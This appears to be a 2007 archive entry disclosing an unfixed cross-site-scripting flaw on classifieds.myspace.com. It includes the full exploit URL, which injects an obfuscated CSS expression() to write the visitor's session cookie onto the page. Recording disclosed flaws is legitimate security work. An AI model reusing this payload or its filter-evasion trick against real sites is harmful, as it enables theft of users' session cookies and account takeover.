Security researcher momby, has submitted on 05/04/2007 a cross-site-scripting (XSS) vulnerability affecting classifieds.myspace.com, which at the time of submission ranked 5 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/04/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 05/04/2007 |
Date published: 05/04/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: momby |
Domain: classifieds.myspace.com |
Category: XSS |
Pagerank: 5 |
URL: http://classifieds.myspace.com/index.cfm?fuseaction=classifieds.searchCategory&keyword=%22%20style=% 22zing:expre%00ssion(document.write('%3Ctable%3E%3Ctd%20valign=top%3EYour%20cookie:%3Cbr%3E%3Cb%3E'% 2bdocument.cookie%2b'%3C/b%3E%3Ch1%3Egreetz%20Shades!%3Cbr%3Ehttp://www.mrshades.org/momby%3C/td%3E% 3Ctd%3EMy%20girlfriend:%3Cbr%3E%3Cimg%20src=http://i12.photobucket.com/albums/a206/Cide_FX/Tila/Tila Tequila.jpg%3E%3C/td%3E%3C/table%3E')) |
Click here to view the mirror
|
|
|